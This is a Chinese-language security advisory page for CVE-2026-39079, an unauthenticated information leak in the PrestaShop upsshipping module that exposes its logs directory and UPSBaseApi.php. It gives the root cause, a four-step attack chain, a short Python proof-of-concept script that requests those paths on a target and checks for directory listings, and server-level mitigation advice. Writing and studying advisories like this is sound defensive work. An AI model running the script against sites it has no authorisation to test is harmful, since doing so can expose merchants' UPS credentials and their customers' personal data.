CVE-2026-39079 CVSS 7.5 高危

CVE-2026-39079 PrestaShop UPS模块信息泄露漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39079

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PrestaShop upsshipping module

漏洞概述

PrestaShop的upsshipping模块在所有版本至2.4.0中存在安全漏洞。由于未能正确限制对敏感目录和文件的访问，远程攻击者无需身份验证即可利用该漏洞。攻击者可以通过访问 `/modules/upsshipping/logs/` 目录或 `/modules/upsshipping/lib/UPSBaseApi.php` 组件获取敏感信息。该漏洞攻击向量为网络，攻击复杂度低，且无需用户交互，导致机密性影响为高。

技术细节

该漏洞的根本原因在于PrestaShop UPS运输模块对敏感文件和目录的访问控制配置不当。模块中的日志目录 `/modules/upsshipping/logs/` 可能未包含适当的访问限制文件（如 `.htaccess`），导致Web服务器允许列出目录内容或直接下载日志文件。此外，`UPSBaseApi.php` 文件可能包含敏感的逻辑或配置信息，且直接暴露在Web路径下。由于CVSS向量为 `AV:N/AC:L/PR:N/UI:N`，攻击者可以通过网络发送简单的HTTP GET请求即可利用此漏洞。成功利用后，攻击者可读取日志中的客户数据、API密钥或系统内部路径信息，为进一步的攻击提供数据支持。

攻击链分析

STEP 1

侦察

攻击者识别目标系统是否使用了PrestaShop，并确认是否安装了upsshipping模块。

STEP 2

漏洞探测

攻击者构造HTTP请求，尝试直接访问 `/modules/upsshipping/logs/` 目录和 `/modules/upsshipping/lib/UPSBaseApi.php` 文件。

STEP 3

信息获取

如果服务器配置不当，攻击者成功获取日志文件列表或下载日志文件内容，以及查看API文件源码。

STEP 4

数据利用

攻击者分析获取到的敏感信息（如UPS凭证、用户PII），用于进一步的欺诈攻击或系统入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com"
vuln_paths = [
    "/modules/upsshipping/logs/",
    "/modules/upsshipping/lib/UPSBaseApi.php"
]

print(f"[*] Checking {target_url} for CVE-2026-39079...")

for path in vuln_paths:
    full_url = target_url + path
    try:
        response = requests.get(full_url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Potential sensitive data found at: {full_url}")
            # Check if directory listing is enabled or file content is exposed
            if "Index of" in response.text or "Parent Directory" in response.text:
                print("    [!] Directory Listing Enabled.")
        elif response.status_code == 403:
            print(f"[-] Access forbidden (403) at: {full_url}")
        else:
            print(f"[*] Received status code {response.status_code} for: {full_url}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to {full_url}: {e}")

影响范围

PrestaShop upsshipping <= 2.4.0

防御指南

临时缓解措施

如果不能立即升级，建议在Web服务器层面（如Apache或Nginx）配置访问规则，明确拒绝外部用户对 `/modules/upsshipping/logs/` 路径及其子文件以及 `/modules/upsshipping/lib/UPSBaseApi.php` 的访问请求。同时，应将日志文件存储在Web根目录之外，防止直接通过URL访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-39079
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-39079
3 Details https://www.cvedetails.com/cve/CVE-2026-39079/
4 VulDB https://vuldb.com/cve/CVE-2026-39079
5 Link https://labs.esokia.com/cve/cve-2026-39079/
6 Link https://labs.esokia.com/cve/cve-2026-39079/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表